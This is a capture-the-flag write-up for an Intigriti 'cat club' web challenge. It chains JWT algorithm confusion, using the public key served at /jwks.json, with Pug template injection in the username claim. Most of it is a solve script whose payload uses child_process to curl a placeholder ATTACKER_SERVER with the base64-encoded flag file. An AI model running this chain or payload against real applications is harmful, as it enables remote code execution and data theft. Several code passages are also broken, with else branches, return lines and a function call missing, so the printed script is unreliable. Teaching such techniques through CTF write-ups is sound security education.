[](https://youtu.be/Vh9SqT9KyL8 "JWT Algorithm Confusion and SSTI (Pug)")
Players open the website to some random cute cats.

j/k they are _my_ cute cats <3>
We can create an account and login, to view more pics.

Not much interesting to note, except perhaps that our username is reflected back to use. Let's check the downloadable source code.
We'll see a `sanitizer.js`, which sounds interesting. It prevents us from entering non-alphanumeric characters in the username.
function sanitizeUsername(username) {
const usernameRegex = /^[a-zA-Z0-9]+$/;
if (!usernameRegex.test(username)) {
throw new BadRequest("Username can only contain letters and numbers.");
return username;
Let's check the code where the username is reflected on the page.
router.get("/cats", getCurrentUser, (req, res) => {
if (!req.user) {
return res.redirect("/login?error=Please log in to view the cat gallery");
const templatePath = path.join(__dirname, "views", "cats.pug");
fs.readFile(templatePath, "utf8", (err, template) => {
if (err) {
return res.render("cats");
if (typeof req.user != "undefined") {
template = template.replace(/guest/g, req.user);
const html = pug.render(template, {
filename: templatePath,
user: req.user,
Looks like an [SSTI](https://portswigger.net/web-security/server-side-template-injection), if we could only enter those dangerous characters! We should check the `getCurrentUser` middleware.
function getCurrentUser(req, res, next) {
const token = req.cookies.token;
if (token) {
.then((payload) => {
req.user = payload.username;
res.locals.user = req.user;
.catch(() => {
req.user = null;
res.locals.user = null;
} else {
req.user = null;
res.locals.user = null;
So, our username is read from the JWT? Maybe we can [tamper with it..](https://portswigger.net/web-security/jwt)
const privateKey = fs.readFileSync(path.join(__dirname, "..", "private_key.pem"), "utf8");
const publicKey = fs.readFileSync(path.join(__dirname, "..", "public_key.pem"), "utf8");
function signJWT(payload) {
return new Promise((resolve, reject) => {
jwt.encode(privateKey, payload, "RS256", (err, token) => {
if (err) {
return reject(new Error("Error encoding token"));
function verifyJWT(token) {
return new Promise((resolve, reject) => {
if (!token || typeof token !== "string" || token.split(".").length !== 3) {
return reject(new Error("Invalid token format"));
jwt.decode(publicKey, token, (err, payload, header) => {
if (err) {
return reject(new Error("Invalid or expired token"));
if (header.alg.toLowerCase() === "none") {
return reject(new Error("Algorithm 'none' is not allowed"));
The `none` algorithm is blocked, so we can't remove the signature verification but how about [algorithm confusion](https://portswigger.net/web-security/jwt/algorithm-confusion)? If we can change the token from `RS256` (asymmetric) to `HS256` (symmetric) and then sign with the public key, the server will use the same key to verify the signature.
You can do this with the JWT tool, or one of the JWT extension in burp. I made a [video series](https://www.youtube.com/watch?v=GIq3naOLrTg&list=PLmqenIp2RQciV955S2rqGAn2UOrR2NX-v) covering the JWT attack material and labs from Portswigger, over on the Intigriti channel if you are interested :)
The public key is exposed on the common `/jwks.json` endpoint.
router.get("/jwks.json", async (req, res) => {
try {
const publicKey = await fsPromises.readFile(path.join(__dirname, "..", "public_key.pem"), "utf8");
const publicKeyObj = crypto.createPublicKey(publicKey);
const publicKeyDetails = publicKeyObj.export({ format: "jwk" });
const jwk = {
kty: "RSA",
n: base64urlEncode(Buffer.from(publicKeyDetails.n, "base64")),
e: base64urlEncode(Buffer.from(publicKeyDetails.e, "base64")),
alg: "RS256",
use: "sig",
res.json({ keys: [jwk] });
} catch (err) {
res.status(500).json({ message: "Error generating JWK" });
All that's left is to modify our username with a Pug SSTI payload, e.g. from [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md)
I automated the whole process with detailed comments explaining each step. You just need to update the `BASE_URL`, `JWT_TOOL_PATH` and the `ATTACKER_SERVER` in the `SSTI_PAYLOAD`.
### solve.py
import requests
import subprocess
from base64 import urlsafe_b64decode
from Crypto.PublicKey import RSA
# Constants for challenge
BASE_URL = 'https://catclub-0.ctf.intigriti.io'
REGISTER_URL = f'{BASE_URL}/register'
LOGIN_URL = f'{BASE_URL}/login'
JWK_URL = f'{BASE_URL}/jwks.json'
CAT_URL = f'{BASE_URL}/cats'
JWT_TOOL_PATH = f'/home/crystal/apps/jwt_tool'
SSTI_PAYLOAD = "#{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad('child_process').exec('curl https://ATTACKER_SERVER/?flag=$(cat /flag* | base64)')}()}"
def base64url_decode(data):
return urlsafe_b64decode(data + b'=' * (-len(data) % 4))
# Register a new user
def register_user(username, password):
print(f"[*] Attempting to register user: {username}")
response = requests.post(
REGISTER_URL, data={"username": username, "password": password})
if response.status_code == 200:
print(f"[*] Registered user: {username}")
print(f"[!] Failed to register user: {response.text}")
return response.status_code == 200
# Login to get JWT
def login_user(username, password):
session = requests.Session()
print(f"[*] Attempting to login user: {username}")
response = session.post(
LOGIN_URL, data={"username": username, "password": password})
if response.status_code == 303:
response = session.get(BASE_URL)
token = session.cookies.get("token")
if token:
print(f"[*] Retrieved JWT: {token}")
print(f"[!] Failed to retrieve JWT")
return token
# Download the JWK (public key)
def download_jwk():
print(f"[*] Attempting to download JWK...")
response = requests.get(JWK_URL)
if response.status_code == 200:
print("[*] JWK download successful")
print(f"[*] JWK Response: {response.json()}")
return response.json()['keys'][0]
print(f"[!] Failed to download JWK: {response.text}")
return None
# Recreate the RSA public key from JWK components (n and e) and save it to a file
def rsa_public_key_from_jwk(jwk):
print(f"[*] Recreating RSA Public Key from JWK...")
n = base64url_decode(jwk['n'].encode('utf-8'))
e = base64url_decode(jwk['e'].encode('utf-8'))
n_int = int.from_bytes(n, 'big')
e_int = int.from_bytes(e, 'big')
rsa_key = RSA.construct((n_int, e_int))
public_key_pem = rsa_key.export_key('PEM')
# Save the public key to a file with a newline at the end
with open("recovered_public.key", "wb") as f:
if not public_key_pem.endswith(b'\n'):
f"[*] Recreated RSA Public Key saved to 'recovered_public.key':\n{public_key_pem.decode()}")
# Tamper JWT with jwt_tool
def modify_jwt_with_tool(token):
print(f"[*] Modifying JWT with jwt_tool...")
command = [
"python", f"{JWT_TOOL_PATH}/jwt_tool.py", token, "-X", "k", "-pk", "./recovered_public.key", "-I", "-pc", "username", "-pv", SSTI_PAYLOAD
# Run jwt_tool and capture the output
result = subprocess.run(command, capture_output=True, text=True)
# Extract the modified token from jwt_tool output
for line in result.stdout.splitlines():
if line.startswith("[+] "):
modified_token = line.split(" ")[1].strip()
print(f"[*] Modified JWT: {modified_token}")
return modified_token
print(f"[!] Modified JWT not found in jwt_tool output")
return None
# Test SSTI injection
def test_ssti(modified_token):
cookies = {'token': modified_token}
print(f"[*] Sending modified JWT in cookies to test SSTI injection...")
response = requests.get(CAT_URL, cookies=cookies)
if response.status_code == 200:
print("[*] SSTI payload executed successfully!")
print(f"[*] Server response:\n{response.text}")
f"[!] SSTI execution failed: {response.status_code} - {response.text}")
def main():
username = "cat"
password = "cat"
# Step 1: Register user
if not register_user(username, password):
print("[!] Failed to register user.")
# Step 2: Login and retrieve JWT
jwt_token = login_user(username, password)
if not jwt_token:
print("[!] Failed to retrieve JWT.")
# Step 3: Download JWK (public key)
jwk = download_jwk()
if not jwk:
print("[!] Failed to download JWK.")
# Step 4: Recreate public key PEM from JWK
# Step 5: Modify JWT claim (inject payload) using jwt_tool
modified_jwt = modify_jwt_with_tool(jwt_token)
if not modified_jwt:
print("[!] Failed to modify JWT using jwt_tool.")
# Step 6: Test SSTI injection by sending the modified JWT
if __name__ == "__main__":
The attacker server will receive a request containing the base64-encoded flag.
Flag: `INTIGRITI{h3y_y0u_c4n7_ch41n_7h053_vuln5_l1k3_7h47}`